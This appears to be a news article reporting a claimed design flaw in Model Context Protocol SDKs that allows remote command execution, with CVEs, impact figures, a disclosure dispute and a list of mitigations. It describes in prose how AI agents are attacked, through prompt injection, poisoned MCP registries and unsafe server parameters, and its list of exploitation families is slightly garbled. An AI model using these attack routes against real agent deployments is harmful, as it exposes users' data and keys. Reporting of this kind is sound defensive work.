Critical Flowise MCP Flaw Allows Remote Code Execution on AI Systems
A critical vulnerability discovered by Security Research has exposed a systemic flaw within the Model Context Protocol (MCP), the industry-standard framework for AI agent communication developed by Anthropic.
The flaw enables Remote Command Execution (RCE) on any system running a vulnerable MCP implementation, including platforms using Flowise’s MCP adapters, putting sensitive user data, internal databases, API keys, and chat histories at risk.
Unlike typical software bugs, this vulnerability is not the result of a simple coding mistake. It stems from an architectural design decision embedded in Anthropic’s official MCP SDKs across all supported programming languages: Python, TypeScript, Java, and Rust.
Critical Flowise MCP Vulnerability
Any developer building AI workflows on top of the MCP foundation unknowingly inherits this exposure, making Flowise-based deployments and similar AI orchestration platforms especially susceptible.
The research identifies four distinct exploitation families: unauthenticated UI injection in popular AI frameworks, hardening bypasses in “protected” environments like Flowise, and zero-click prompt injection.
In AI IDEs such as Windsurf and Cursor, and a malicious marketplace distribution, 9 out of 11 MCP registries were successfully poisoned with malicious packages.
The scale of impact is significant. The vulnerability spans a supply chain with over 150 million downloads, more than 7,000 publicly accessible MCP servers, and an estimated 200,000 vulnerable instances globally.
Security team successfully executed commands on six live production platforms and identified critical vulnerabilities in tools, including LiteLLM, LangChain, and IBM’s LangFlow.
Ten CVEs have been issued so far, including critical-severity flaws in GPT Researcher (CVE-2025-65720), Agent Zero (CVE-2026-30624), Windsurf (CVE-2026-30615), and DocsGPT (CVE-2026-26015), among others. Several have since been patched, while others remain in reported status awaiting fixes.

OX Security repeatedly recommended root-level patches to Anthropic that would have protected millions of downstream users.
Anthropic declined, characterizing the behavior as “expected” and citing architectural intent. Despite over 30 responsible disclosures and more than 10 high and critical CVEs, the root cause remains unaddressed at the protocol level.
Mitigations
Security teams are advised to take the following steps immediately:
- Block public internet access to AI services connected to sensitive APIs or databases
- Treat all external MCP configuration input as untrusted; avoid allowing raw user input into
StdioServerParameters - Install MCP servers only from verified sources such as the official GitHub MCP Registry
- Run MCP-enabled services inside sandboxed environments with restricted permissions
- Monitor tool invocations for unexpected background activity or data exfiltration attempts
- Update all affected services to their latest patched versions immediately.
No Comment! Be the first one.